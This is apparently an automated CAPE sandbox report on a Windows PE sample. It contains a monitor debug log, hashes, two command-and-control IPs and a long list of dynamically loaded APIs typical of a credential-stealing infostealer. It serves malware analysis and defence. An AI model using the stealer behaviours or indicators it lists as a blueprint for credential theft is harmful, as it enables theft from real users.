2020-06-30 13:47:07,546 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\fuukwRlLO.
2020-06-30 13:47:07,609 [root] DEBUG: Loader: Injecting process 3176 (thread 3824) with C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:47:07,609 [root] DEBUG: Process image base: 0x00000000FFC60000
2020-06-30 13:47:07,640 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:47:07,640 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-30 13:47:07,656 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:47:07,687 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3176
2020-06-30 13:47:07,687 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 3176.
2020-06-30 13:47:07,718 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:47:07,718 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:47:07,765 [root] INFO: Disabling sleep skipping.
2020-06-30 13:47:07,765 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:47:07,781 [root] DEBUG: CAPE initialised: 64-bit monitor loaded in process 3176 at 0x0000000070130000, image base 0x00000000FFC60000, stack from 0x00000000000F4000-0x0000000000100000
2020-06-30 13:47:07,781 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2020-06-30 13:47:07,828 [root] WARNING: b'Unable to place hook on LockResource'
2020-06-30 13:47:07,828 [root] WARNING: b'Unable to hook LockResource'
2020-06-30 13:47:07,843 [root] INFO: Loaded monitor into process with pid 3176
2020-06-30 13:47:37,703 [root] INFO: Process with pid 3176 has terminated
2020-06-30 13:47:43,515 [root] DEBUG: DLL unloaded from 0x76700000.
2020-06-30 13:47:43,593 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\lsass.exe.
2020-06-30 13:47:49,531 [root] DEBUG: CreateProcessHandler: Injection info set for new process 2472, ImageBase: 0x00000000FFC60000
2020-06-30 13:47:49,578 [root] INFO: Process with pid 2472 has terminated
2020-06-30 13:47:58,812 [root] DEBUG: DLL unloaded from 0x73000000.
2020-06-30 13:47:58,843 [root] DEBUG: DLL unloaded from 0x706B0000.
2020-06-30 13:48:05,531 [root] DEBUG: DLL unloaded from 0x75CC0000.
2020-06-30 13:48:05,984 [root] DEBUG: DLL loaded at 0x73010000: C:\Windows\system32\Pstorec (0xd000 bytes).
2020-06-30 13:48:11,500 [root] DEBUG: DLL loaded at 0x72FF0000: C:\Windows\system32\ATL (0x14000 bytes).
2020-06-30 13:48:11,625 [root] DEBUG: set_caller_info: Adding region at 0x73010000 to caller regions list (ntdll::LdrLoadDll).
2020-06-30 13:48:17,562 [root] DEBUG: set_caller_info: Calling region at 0x73010000 skipped.
2020-06-30 13:48:23,546 [root] DEBUG: DLL unloaded from 0x73010000.
2020-06-30 13:48:29,500 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-30 13:48:29,515 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\hv8745939v498h.zip
2020-06-30 13:48:30,609 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
2020-06-30 13:48:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
2020-06-30 13:48:41,765 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
2020-06-30 13:48:41,859 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
2020-06-30 13:48:42,218 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
2020-06-30 13:48:42,328 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
2020-06-30 13:48:42,437 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
2020-06-30 13:48:42,546 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
2020-06-30 13:48:42,656 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
2020-06-30 13:48:42,750 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
2020-06-30 13:48:43,015 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
2020-06-30 13:48:43,218 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
2020-06-30 13:48:43,281 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
2020-06-30 13:48:44,468 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
2020-06-30 13:48:44,796 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
2020-06-30 13:48:44,859 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
2020-06-30 13:48:53,500 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
2020-06-30 13:48:57,796 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
2020-06-30 13:48:57,968 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
2020-06-30 13:48:58,093 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
2020-06-30 13:48:59,187 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
2020-06-30 13:49:11,812 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
2020-06-30 13:49:12,046 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
2020-06-30 13:49:12,859 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
2020-06-30 13:49:14,781 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-30 13:49:14,781 [lib.api.process] INFO: Terminate event set for process 4716
2020-06-30 13:49:19,500 [root] DEBUG: Terminate Event: Attempting to dump process 4716
2020-06-30 13:49:19,546 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00400000.
2020-06-30 13:49:19,781 [lib.api.process] INFO: Termination confirmed for process 4716
2020-06-30 13:49:19,781 [root] INFO: Terminate event set for process 4716.
2020-06-30 13:49:25,515 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-06-30 13:49:26,171 [lib.api.process] INFO: Terminate event set for process 476
2020-06-30 13:49:26,187 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
2020-06-30 13:49:26,203 [lib.api.process] INFO: Termination confirmed for process 476
2020-06-30 13:49:26,203 [root] INFO: Terminate event set for process 476.
2020-06-30 13:49:26,203 [root] INFO: Created shutdown mutex.
2020-06-30 13:49:27,203 [root] INFO: Shutting down package.
2020-06-30 13:49:27,203 [root] INFO: Stopping auxiliary modules.
2020-06-30 13:49:45,531 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
2020-06-30 13:49:45,718 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
2020-06-30 13:49:51,500 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
2020-06-30 13:49:57,609 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll

Machine

Name Label Manager Started On Shutdown On
win7x64_1 win7x64_5 KVM 2020-06-30 13:52:41 2020-06-30 13:59:00

File Details

File Name MUo8TIzTu0DDL
File Size 479744 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2020-01-02 11:13:07
MD5 bead5dfd7b20f087a2439a4268416897
SHA1 fc6776a54cfb15967aabea74c131c86c1e8f1fcd
SHA256 d4580d369c916d7b10d162f0569a80211f87591905a8a1514b660f10e77f3ec7
SHA512 2906f6052af1b149067b5cbb9b9e9f967f988489cf443f651ce8482bf09f7095885ab6a46f4c728fd0c06d463b52211b3feae10162eb9e56d7033466128e2928
CRC32 DF782E91
Ssdeep 12288:+abjDMd0iB26mBvzCMo2jGAAenRP7onQq:BLMFBb0nRP7onQq
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction - unpacking
Attempts to connect to a dead IP:Port (2 unique times)
IP: 195.201.225.248:443 (Germany)
IP: 35.223.217.188:80 (United States)
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 4716 trigged the Yara rule 'embedded_pe'
Hit: PID 4716 trigged the Yara rule 'embedded_win_api'
Hit: PID 4716 trigged the Yara rule 'shellcode_patterns'
Creates RWX memory
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetLocaleInfoA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/RemoveDirectoryTransactedA
DynamicLoader: kernel32.dll/GetUserDefaultLCID
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetSystemPowerStatus
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/MultiByteToWideChar
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/GetEnvironmentVariableA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/GetLogicalDriveStringsA
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/GetComputerNameA
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/SetStdHandle
DynamicLoader: kernel32.dll/FreeEnvironmentStringsW
DynamicLoader: kernel32.dll/GetEnvironmentStringsW
DynamicLoader: kernel32.dll/GetOEMCP
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/IsValidCodePage
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/OutputDebugStringW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetFileAttributesA
DynamicLoader: kernel32.dll/LocalFileTimeToFileTime
DynamicLoader: kernel32.dll/SetCurrentDirectoryA
DynamicLoader: kernel32.dll/GetCurrentDirectoryA
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/SetFileTime
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/GetDriveTypeA
DynamicLoader: kernel32.dll/CopyFileTransactedA
DynamicLoader: kernel32.dll/CreateDirectoryTransactedA
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/GetProcessHeap
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/ReadConsoleW
DynamicLoader: kernel32.dll/EnumSystemLocalesW
DynamicLoader: kernel32.dll/IsValidLocale
DynamicLoader: kernel32.dll/GetTimeFormatW
DynamicLoader: kernel32.dll/GetDateFormatW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleCP
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/GetFileSizeEx
DynamicLoader: kernel32.dll/HeapSize
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/GetCommandLineA
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/WriteConsoleW
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/DeleteFileTransactedA
DynamicLoader: kernel32.dll/GetFileInformationByHandle
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/RtlUnwind
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/InitializeSListHead
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/QueryPerformanceCounter
DynamicLoader: kernel32.dll/GetStartupInfoW
DynamicLoader: kernel32.dll/SetUnhandledExceptionFilter
DynamicLoader: kernel32.dll/UnhandledExceptionFilter
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/GetCPInfo
DynamicLoader: kernel32.dll/GetStringTypeW
DynamicLoader: kernel32.dll/GetLocaleInfoW
DynamicLoader: kernel32.dll/LCMapStringW
DynamicLoader: kernel32.dll/CompareStringW
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/TlsFree
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/SetCurrentDirectoryW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/FindFirstFileExW
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/AreFileApisANSI
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: USER32.dll/GetDesktopWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: USER32.dll/GetWindowDC
DynamicLoader: USER32.dll/GetWindowRect
DynamicLoader: GDI32.dll/BitBlt
DynamicLoader: GDI32.dll/SaveDC
DynamicLoader: GDI32.dll/SelectObject
DynamicLoader: GDI32.dll/CreateDIBSection
DynamicLoader: GDI32.dll/CreateCompatibleDC
DynamicLoader: GDI32.dll/GetDeviceCaps
DynamicLoader: GDI32.dll/DeleteDC
DynamicLoader: GDI32.dll/RestoreDC
DynamicLoader: GDI32.dll/DeleteObject
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: ADVAPI32.dll/CreateProcessWithTokenW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CredEnumerateW
DynamicLoader: ADVAPI32.dll/CredFree
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: SHELL32.dll/SHGetFolderPathA
DynamicLoader: SHELL32.dll/ShellExecuteA
DynamicLoader: SHELL32.dll/SHGetSpecialFolderPathW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: USERENV.dll/GetUserProfileDirectoryA
DynamicLoader: ktmw32.dll/RollbackTransaction
DynamicLoader: ktmw32.dll/CreateTransaction
DynamicLoader: ktmw32.dll/CommitTransaction
DynamicLoader: bcrypt.dll/BCryptDecrypt
DynamicLoader: bcrypt.dll/BCryptDestroyKey
DynamicLoader: bcrypt.dll/BCryptGenerateSymmetricKey
DynamicLoader: bcrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcrypt.dll/BCryptSetProperty
DynamicLoader: bcrypt.dll/BCryptCloseAlgorithmProvider
DynamicLoader: CRYPT32.dll/CryptStringToBinaryA
DynamicLoader: CRYPT32.dll/CryptUnprotectData
DynamicLoader: SHLWAPI.dll/StrCmpNW
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: gdiplus.dll/GdiplusStartup
DynamicLoader: gdiplus.dll/GdipGetImageEncodersSize
DynamicLoader: gdiplus.dll/GdipFree
DynamicLoader: gdiplus.dll/GdipDisposeImage
DynamicLoader: gdiplus.dll/GdipCreateBitmapFromHBITMAP
DynamicLoader: gdiplus.dll/GdipAlloc
DynamicLoader: gdiplus.dll/GdipCloneImage
DynamicLoader: gdiplus.dll/GdipGetImageEncoders
DynamicLoader: gdiplus.dll/GdiplusShutdown
DynamicLoader: gdiplus.dll/GdipSaveImageToFile
DynamicLoader: msvcr100.dll/atexit
DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: kernel32.dll/AreFileApisANSI
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/InitOnceExecuteOnce
DynamicLoader: kernel32.dll/CreateEventExW
DynamicLoader: kernel32.dll/CreateSemaphoreW
DynamicLoader: kernel32.dll/CreateSemaphoreExW
DynamicLoader: kernel32.dll/CreateThreadpoolTimer
DynamicLoader: kernel32.dll/SetThreadpoolTimer
DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: kernel32.dll/CloseThreadpoolTimer
DynamicLoader: kernel32.dll/CreateThreadpoolWait
DynamicLoader: kernel32.dll/SetThreadpoolWait
DynamicLoader: kernel32.dll/CloseThreadpoolWait
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: kernel32.dll/GetCurrentProcessorNumber
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/GetFileInformationByHandleEx
DynamicLoader: kernel32.dll/SetFileInformationByHandle
DynamicLoader: kernel32.dll/GetSystemTimePreciseAsFileTime
DynamicLoader: kernel32.dll/InitializeConditionVariable
DynamicLoader: kernel32.dll/WakeConditionVariable
DynamicLoader: kernel32.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/SleepConditionVariableCS
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/TryAcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/SleepConditionVariableSRW
DynamicLoader: kernel32.dll/CreateThreadpoolWork
DynamicLoader: kernel32.dll/SubmitThreadpoolWork
DynamicLoader: kernel32.dll/CloseThreadpoolWork
DynamicLoader: kernel32.dll/CompareStringEx
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: schannel.dll/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptGetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: urlmon.dll/URLDownloadToFileA
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: WS2_32.dll/GetAddrInfoExW
DynamicLoader: WS2_32.dll/FreeAddrInfoExW
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/GetModuleHandleExW
